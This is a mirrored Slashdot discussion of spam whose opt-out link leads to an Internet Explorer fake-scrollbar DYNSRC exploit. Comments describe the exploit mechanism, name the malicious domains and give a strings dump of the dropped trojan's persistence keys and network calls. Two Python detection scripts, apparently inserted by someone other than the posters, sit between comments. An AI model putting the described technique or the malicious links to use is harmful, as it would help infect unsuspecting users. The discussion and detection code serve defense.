Slashdot Mirror


Spam Opt-out Link Triggers Malicious Code Attack

Maestro4k writes "The Register is reporting on a new spam E-mail circulating out there. In it, clicking on the 'Click here to remove' link launches a site that, when the user scrolls the page, triggers a drag-drop JavaScript exploit. Scarily, the E-mail actually complies with the CAN-SPAM act, as it only requires spammers to put an opt-out link in their mailings. As The Reg says, 'It comes as little surprise that this feature is being taken advantage of in a social engineering exploit; but it does illustrate the security problems of the opt-out approach that were always apparent to security experts - and ignored by legislators.' The link in question points to www. xcelent.biz (as in The Reg story, space intentionally included), so even if you can't block the mail yet, it should be easy to block access to the site with the exploit. I suspect this is just the beginning and most spam will include 'features' such as this in the near future."

12 of 327 comments

  1. devious by hendridm · Score: 4, Informative

    Fortunately, there is a patch for it, Mozilla is unaffected, and Norton and McAfee (at minimum) seem to detect it. That just leaves the millions of unpatched Windows machines that are running outdated or low-grade antivirus!

  2. I don't know about you by OverlordQ · Score: 4, Informative
    but my AntiVirus has detected this exploit for a *long* time.

    JS/Exploit-DragDrop.b.gen
    --
    Your hair look like poop, Bob! - Wanker.
    1. Re:I don't know about you by orangesquid · Score: 4, Informative

      A simple string analysis of the trojan reveals some intimidating-looking strings:
      GetSystemDirectoryA, xProxyBot v 1.0.0, 1.0.0, w32.exe,
      Windows Service Application, www.earthlabs.biz,
      sockproxy/rec.php.
      Software\Microsoft\Windows\CurrentVersion\Run
      Software\Microsoft\Windows\CurrentVersion\RunServices
      %s?&p=%d&v=%s
      VisitWebPageThread, Socket4RandomThread, Socket4ServerThread
      SYSTEM\CurrentControlSet\Control\SafeBoot\
      explorer.exe
      Mozilla/4.0 (compatible)
      InternetCloseHandle, InternetGetLastResponseInfoA
      InternetReadFile, InternetCrackUrlA
      InternetOpenUrlA
      InternetOpenA, InternetConnectA
      FtpPutFileA, FtpGetFileA
      HttpSendRequestA, HttpOpenRequestA
      InternetGetConnectedStateEx, InternetGetConnectedState

      --
      --TheOrangeSquid Is it any wonder things seem so awry? We swim in a sea of confusion and don't have to think to survive
  3. Re:Microsoft says "No Problem" by Anonymous Coward · Score: 5, Informative

    Here is the pertinent CERT advisory for this flaw.

    The idea is that all the website designer has to do is make an image that LOOKS like a scrollbar. The user goes and clicks and drags it to scroll down, not knowing it's fake. If there is a DYNSRC="..." attribute specified in the <IMG...> tag, Internet Explorer downloads and runs whatever program is specified, without any kind of prompt whatsoever.

    Even with SP2 installed.

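The fake-scrollbar trick described above hinges on an <img> tag carrying a DYNSRC attribute, which gives a mail or web gateway something concrete to flag. The following is an added example, not code from the thread or from any product named in it: it parses HTML, records every IMG with a DYNSRC, and returns "block" when the target looks executable; the placeholder host and the extension list are assumptions.

```python
from html.parser import HTMLParser
from posixpath import splitext
from urllib.parse import urlsplit

# File types IE would hand to the shell rather than display; assumed list for the demo.
EXECUTABLE_EXTS = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".hta"}


class DynsrcScanner(HTMLParser):
    """Records every <img> that carries a DYNSRC attribute, with a verdict per hit."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "img":  # HTMLParser already lowercases tag and attribute names
            return
        attrs = {name: (value or "") for name, value in attrs}
        if "dynsrc" not in attrs:
            return
        target = attrs["dynsrc"].strip()
        ext = splitext(urlsplit(target).path)[1].lower()
        self.findings.append({
            "dynsrc": target,
            "src": attrs.get("src", ""),  # the decoy image, e.g. a fake scrollbar
            "executable": ext in EXECUTABLE_EXTS,
        })


def scan_html(html):
    """Return one finding dict per <img ... DYNSRC=...> in the document."""
    scanner = DynsrcScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def verdict(html):
    """'block' if a DYNSRC names an executable, 'review' for any other DYNSRC, else 'allow'."""
    hits = scan_html(html)
    if any(hit["executable"] for hit in hits):
        return "block"
    return "review" if hits else "allow"


# Constructed sample shaped like the page the thread describes: a tall scrollbar
# image whose DYNSRC points at a program. The host is a placeholder.
SAMPLE_HTML = """<html><body><p>Click here to remove</p>
<img src="scrollbar.gif" DYNSRC="http://example.invalid/windows-update.exe" height="400">
<img src="logo.gif" alt="logo"></body></html>"""
```

A legitimate DYNSRC (IE's inline AVI feature) lands in "review" rather than "block", so the rule can be tuned without silently dropping old intranet pages.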
  4. New News? by Kartik3 · Score: 5, Informative

    Spammers have often used an "unsubscribe" link or something similar only to verify your email address and send you more spam. While not the same as triggering an exploit, I've been under the impression that spammers have taken advantage of users with an "opt out" type of link in this way for quite a while now.

  5. lamer is hosted on hinet.com by Indy1 · Score: 4, Informative

    host www.xcelent.biz
    www.xcelent.biz has address 61.218.79.53
    host 61.218.79.53
    53.79.218.61.in-addr.arpa domain name pointer 61-218-79-53.HINET-IP.hinet.net

    And people wonder why I firewall 60/7.

    --
    Lawyers, MBA's, RIAA? A jedi fears not these things!
  6. Exploit by jargoone · Score: 5, Informative

    The article didn't give much explanation about the drag-and-drop exploit itself. Understandably, given the audience, but I was curious. Here's a good link: http://xforce.iss.net/xforce/xfdb/13679

  7. Even better - choose a link with graphics on. by cliveholloway · Score: 4, Informative
    After a little guessing:

    a b c d. "d" looks pretty heavy on graphics.

    .02

    cLive ;-)

    --
    -- Trinity in high heels carrying a whip: The donimatrix - there is no spoonerism
  8. Re:Dumb by Benanov · Score: 5, Informative

    That comment means it was ripped from a proof-of-concept website published a while ago: http://www.mikx.de/scrollbar/ Amazingly shameless. They stole this guy's code, AND they're using it for phishing attacks.

  9. Other sites on same server doing the same thing. by Chatmag · Score: 4, Informative

    There is a slew of sites on that same server, according to Webhosting Info, that are infected, some with windows-update.exe and others with windows-update32.exe.

    --
    Pete Carr Owner Chatmag.com
  10. Hazardous link by abb3w · Score: 4, Informative
    Now, now, there might be someone who might go to that page with IE. However, no doubt the Slashdot community would be interested in attempting their own effort at reverse engineering the trojan that they want you to download.

    Of course, anyone who installs that on a non-isolated, non-virtual machine pretty much deserves the results. It looks like it has the standard "Software\Microsoft\Windows\CurrentVersion\Run", "Software\Microsoft\Windows\CurrentVersion\RunServices", and "SYSTEM\CurrentControlSet\Control\SafeBoot\" registry hooks. (Unix "strings" is your friend....)

    --
    //Information does not want to be free; it wants to breed.
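Both the strings dump in the reply to comment 2 and the "Unix strings is your friend" note just above come down to the same triage step: pull printable strings out of the file and look for persistence keys, WinINet/FTP imports and a beacon format string. The following is an added example, not the posters' own tooling: a minimal strings extractor plus indicator matching run over constructed sample bytes; the indicator list is an assumption for the demo, not a production signature.

```python
import re

# Indicator categories drawn from the strings the posters listed; the list itself
# is an assumption for the demo.
INDICATORS = {
    "persistence": ["currentversion\\run", "control\\safeboot"],
    "network": ["internetopen", "internetconnect", "internetreadfile",
                "httpsendrequest", "httpopenrequest", "ftpputfile", "ftpgetfile"],
    "beacon": ["%s?&p=%d&v=%s", "mozilla/4.0 (compatible)"],
}


def extract_strings(blob, min_len=6):
    """ASCII equivalent of Unix `strings`: runs of printable bytes of at least min_len."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(blob)]


def triage(blob):
    """Map each indicator category to the extracted strings that matched it."""
    hits = {category: [] for category in INDICATORS}
    for text in extract_strings(blob):
        lowered = text.lower()
        for category, needles in INDICATORS.items():
            if any(needle in lowered for needle in needles):
                hits[category].append(text)
    return hits


def looks_like_downloader_bot(hits):
    """Persistence keys plus WinINet/FTP imports plus a beacon template is the
    combination the thread's strings dump shows; flag only when all three appear."""
    return all(hits[category] for category in ("persistence", "network", "beacon"))


# Constructed sample: binary junk around the kinds of strings posted in the thread.
SAMPLE = (
    b"MZ\x90\x00\x03\x00\xff\xff"
    b"Software\\Microsoft\\Windows\\CurrentVersion\\Run\x00"
    b"SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\\x00\x01\x02"
    b"InternetOpenUrlA\x00HttpSendRequestA\x00"
    b"%s?&p=%d&v=%s\x00Mozilla/4.0 (compatible)\x00"
    b"ab\x00"  # too short to be reported as a string
)

if __name__ == "__main__":
    for category, matched in triage(SAMPLE).items():
        print(category, matched)
    print("downloader bot pattern:", looks_like_downloader_bot(triage(SAMPLE)))
```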
  11. Re:But then again . . . by mdfst13 · Score: 5, Informative

    http://www.xcelent.biz/d/ is a link to another page in that domain. It also has more graphics, for better slashdotting potential.

    P.S. Still be careful. They could always move the pages around.